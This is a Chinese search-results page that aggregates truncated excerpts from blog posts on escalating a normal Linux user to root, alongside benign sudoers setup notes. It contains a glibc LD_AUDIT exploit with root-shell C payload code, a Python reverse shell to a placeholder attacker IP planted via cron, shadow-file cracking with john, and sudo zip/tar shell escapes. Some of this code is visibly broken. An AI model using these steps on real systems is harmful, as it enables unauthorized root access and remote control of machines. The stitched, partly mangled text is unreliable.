精华内容
下载资源
问答
  • 渗透中如何将Linux普通用户提权到root,首先创建一个普通用户,并且给普通用户设置一个密码,保证能用su 命令能用普通用户登
  • 需要首先有个普通用户的shell 实验环境:RHEL6.8 应该只针对RHEL 5/6,别的版本没试 如下都是在普通用户下执行的,例如oracle用户 mkdir /tmp/exploit ln /bin/ping /tmp/exploit/target exec 3< /...

    需要首先有个普通用户的shell

    实验环境:RHEL6.8

    应该只针对RHEL 5/6,别的版本没试


    如下都是在普通用户下执行的,例如oracle用户

    mkdir /tmp/exploit
    
    ln /bin/ping /tmp/exploit/target
    
    exec 3< /tmp/exploit/target
    
    rm -rf /tmp/exploit

     

    vim /tmp/payload.c   编辑文件,写入:
     

    void __attribute__((constructor)) init()
    
    {
    
             setuid(0);
    
             system("/bin/bash");
    
    }
    gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c

    使用gcc编译

    使用当前的普通用户执行如下,会报错,然后你就会发现shell变成了root

    LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

     

    注意最后需要在命令行中手动去执行LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3,否则不会进入root#

    展开全文
  • 对于centos5.5版本系统的一次由普通用户提权到root权限的尝试 1.查看系统版本 2.查看systemtap版本 3.由python用户提权到root 防御方法: yum update systemtap到较新版本 本文转自 geekwolf 51CTO博客,原文...

    对于centos5.5版本系统的一次由普通用户提权到root权限的尝试

    1.查看系统版本

    2.查看systemtap版本

     

    3.由python用户提权到root

    防御方法:

    yum update systemtap到较新版本



    本文转自    geekwolf   51CTO博客,原文链接:http://blog.51cto.com/linuxgeek/999231

    展开全文
  • root普通用户提权:vi /etc/sudoers 定位110行(不同操作系统版本可能不是同一行,是以下内容那一行即可) 110 # %wheel ALL=(ALL) NOPASSWD:ALL 复制这一行,添加文末 将 # %wheel 替换为用户的名字 保存...

    通过配置文件给普通用户提权
    用root给普通用户提权:vi /etc/sudoers
    定位到110行(不同操作系统版本可能不是同一行,是以下内容那一行即可)
    110 # %wheel ALL=(ALL) NOPASSWD:ALL
    复制这一行,添加到文末
    将 # %wheel 替换为用户的名字
    保存退出
    (撤权时删除这行再保存就行)

    创建用户时直接给该用户提权
    提升权限的另一种方法:
    创建用户并直接提升root权限: useradd 用户名 -G wheel (在wheel组中的用户都有root权限,wheel是系统已经存在的组)

    展开全文
  • CTF-普通用户提权

    2020-05-03 22:28:58
    在我们拿下服务器web服务往往只是低权限用户,对于内网渗透,我们往往需要root权限,Linux系统提权包括使用溢出漏洞已及利用系统配置文件。 提权前提:  1.拿低权限shell  2.被入侵机器上有nc,python,perl...

       在我们拿下服务器web服务往往只是低权限用户,对于内网渗透,我们往往需要root权限,Linux系统提权包括使用溢出漏洞已及利用系统配置文件。
    

    提权前提:

      1.拿到低权限shell
    
      2.被入侵机器上有nc,python,perl等常见linux下的工具
    
      3.有权上传下载文件
    

    1. 利用内核漏洞

    通杀内核漏洞十分少见,因此我们先应对系统相关进行信息收集。

    利用searchsplot

    
    查看发行版本:  
    
    cat /etc/issue
    
    cat /etc/*-release
    
    lsb_realse -a
    
    查看内核版本:
    
    uname -a
    
    如果具有内核溢出漏洞我们就上传溢出代码,编译执行
    
    gcc  xxx.c  -o  exploit
    
    chmod +x exploit
    
    ./exploit
    

    2. 利用明文root密码提权

    Linux密码大多都和/etc/passwd 和 /etc/shadow 这两个配置文件有关。Passwd里储存了用户,shadow里密码的hash。出于安全考虑passwd是全用户可读,root可写,shadow是仅root可读写。

    例如 破解linux用户名和对应密码

    /etc/passwd /etc/shadow
     (如果拿到/etc/shadow与/etc/passwd文件,可利用john破解)
    unshadow passwd shadow >cracked 
    john cracked
    

    3. 利用定时计划任务

    etc/crontab 文件是用来设定系统定期执行任务,需要root权限,不同用户都可以有不同定时任务,如果在 /etc/crontab 下有某个用户执行的定时计划文件,但是具体目录下没有这个定时执行的文件,可以自行创建反弹shell ,用创建的脚本替换原来的py脚本,netcat执行监听获得对应用户的权限

    如果有定时执行任务的文件,可以切换到对应的目录,查看对应的权限,查看当前用户是否具有读写权限

    复制代码

    import os,subprocess,socket
     
    s=socket.socket()
    s.connect(("攻击机ip地址","攻击机监听端口"))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess(["/bin/sh","-i "])
    

    启动监听: nc -nlvp port

    4. 密码复用

    管理员可能会设置重复使用的密码,因此可能数据库或者web后台的密码就是root密码
    拥有疑似root的秘密可以尝试ssh登录,若禁止root登录或被防火墙挡住,我们就想办法在低权限上输入密码,当然一般情况下linux会要求用户必须从终端设备(tty)中输入密码,禁止标准输入,sudo常常不能使用

    因此我们可以用python模拟一个终端

    python -c "import pty;pty.spawn('/bin/bash')"
    

    5. 利用zip提权

    使用sudo -l 查看当前用户可以使用的root提权命令信息,发现可以执行tar和zip相关命令。
    1.zip提权

    touch exploit
    sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"
    

    2.tar提权

    sudo -u root tar cf /dev/null exploit -checkpoint=1 --checkpoint-action="/bin/bash"
    
    展开全文
  • 基于Linux下的root提权骚操作

    千次阅读 2020-01-30 14:51:24
    博主还是小白,总结几个有关于在入侵靶机后,如何在Linux下的关于普通用户提权到root下的操作,如有错误或其他请多多包含,希望提出多交流。 0x01_操作简介 提权的三个骚操作: 内核溢出 明文密文解密 计划任何进程...
  • 命令sudo用 su 命令 可以切换用户的身份,而且每一个普通用户都能切换到root身份,如果某个用户不小心泄露了root密码,那么系统将会非常的不安全。为了解决这一个问题,sudo 命令 提权访问 出来了。使用sudo执行一个...
  • 我这里的普通用户是zhangfei 首先还是需要知道root的密码 第一步:切换到root下:su,并输入密码 第二步:输入 vi/etc/sudoers,加入一行即可(zhangfei ALL=(ALL) ALL) 找到 root ALL=(ALL) ALL 加入一行...
  • 以下两种方法都可以讲普通用提升为root用户 (1)使用su切换用户 ...[alice@localhost~]$ su - # 切换到root用户 password: [root@localhost~]# useradd u1 # 成功创建 (2)以root身份授权普通...
  • 前置知识:Sudo 的全称是“superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下以其它用户的权限运行应用程序或命令,通常是以 root 用户身份运行命令,以减少 root 用户的登录和管理时间,...
  • 如何使用sudo 提权给普通用户 ...//给普通用户提权su..这样普通用户就可以无密码切换到root 详细使用如下: 情景模拟:oldboy用户想看/var/log/secure 第一步:创建oldboy用户 useradd oldboy 第二步:切换
  • linux中普通用户的sudo提权

    千次阅读 2019-04-11 15:56:02
    sudo提权 企业中不允许员工使用shell的...申请到普通账号后,根据规定让拥有root权限的同事添加用户 useradd+用户名:添加一个普通账号 id用户名: 查看账号是否添加成功 vim /etc/sudoers 在最后一行加入 ...
  • 用户提权与切换用户

    2021-03-13 22:33:58
    1. 用户提权 2. 用户的工作环境相关文件 3. su命令用户提权 4. sudo用户提权 5. sudo设置组 6. sudo设置案例 7. 编辑器练习题 8. 用户练习题 1. 用户提权 1. su 使用普通用户登录,然后执行su命令切换到root用户 ...
  • 2、找到你想提权用户(比如test),将用户名后面的数字改成0 找到用户test test:x:1000:1000::/home/test 修改权限 test:x:0:0::/home/test 3、重启电脑,登录test账户。 方法二、临时使...
  • 用户如何提权

    2020-07-31 17:25:32
    1. su 使用普通用户登录,然后执行su命令切换到root用户 优点:简单 缺点:需要知道root密码 2. sudo 使用普通用户管理,当需要使用root的权限的时候,进行提权 优点:安全、方便 缺点:复杂 shell的分类及...
  • 用户提权su sudo

    2020-07-31 19:13:07
    那么同时普通用户如果知道root密码也可以通过su - root切换到root用户,然后获得root权限,但是这样有很大的风险,如果普通用户权限太高会存在安全问题。 vim /etc/pam.d/su /etc/pam.d是一个存放有很多模块的目录...
  • 一、永久提权普通用户状态下,使用su命令,输入root的密码后可以直接切换到root用户中。命令:su - root 命令:exit (退出到上一个登录的用户)二、临时提权 1、sudo简介 将当前用户切换到超级用户下,然后以...
  • 用户提权 su 使用普通用户登录,然后执行su命令切换到root用户 优点:简单 缺点需要知道root用户密码 su username #非登录式shell(下文会讲) su -username #登录式shell 区别就是加载的配置文件不一样 su username...
  • 提权:利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限 RHEL5-RHEL6下面都可以实现,root的UID是零 创建一个普通用户 useradd andy 切换andy用户 su - andy 查看当前用户是谁 whoami 查看...
  • Linux中root用户#与普通用户$的切换

    千次阅读 2019-03-15 12:44:17
    首先,#和$ 符号是命令提示符,# 表示 root 用户,$ 表示非 root 用户。 你可以用 su - (这个 - 可以让 su...或者直接 sudo xxxxxxx 的方式执行命令,这个命令在运行时 sudo 会他把提权root 权限执行。 其实获得...
  • 用户提权su和sudo概述永久提权su临时提权sudo 概述 众所周知,在Linux下对很多文件进行修改都需要有root权限,比如创建、删除用户等操作,但是很多情况下我们仅仅只是以普通用户的身份登录系统的,因为安全性考虑...
  • 普通用户状态下,使用su命令,输入root的密码后可以直接切换到root用户中。 命令:su -root 命令:exit (退出到上一个登录的用户) 二、临时提权 1、sudo简介 将当前用户切换到超级用户下,然后以...
  • 用户切换与提权

    2019-09-18 06:44:07
    Linux服务器在实际操作中并不建议直接使用root进行登录,因为root的权限最高,一旦失误造成的破坏也是巨大的,因此我们还要限制别的用户随意切换到root用户。因此我们要为普通用户提供一种身份切换或权限提升机制,...
  • 往往公司的服务器对外都是禁止root用户直接登录,所以我们通常使用的都是普通用户。...1.su切换用户,使用普通用户登录,然后使用su命令切换到root。优点:简单 缺点:需要知道root密码 2.sudo提权,当需要使...
  • android ROOT 原理

    2014-01-27 10:52:10
    未root时,权限管理是很严格的,很多文件都不能增删改,很多额外功能无法使用...正统的发行版linux中有一个su命令,用于普通用户提权到root。 su本来在linux里是不与其它程序关联 的, 在现在的android中su是与super
  • useradd 添加用户后,用sudo无法提权,虽然密码正确,也会提示密码错误 解决方法 在root用户下 chmod 777 /etc/sudoers echo 'username ALL=(ALL) ALL' &...现在在切换到普通用户就可以使用sudo 提权了 ...
  • 大部分计算机系统都被设计为可以「多个用户一起使用」,其中就产生了管理员用户和普通用户普通用户可以理解为使用者,他的权限只可以查看、编辑部分文件;而管理员的权限则可以对全部的文件进行「增删改查」操作,...

空空如也

空空如也

1 2 3 4 5
收藏数 96
精华内容 38
关键字:

普通用户提权到root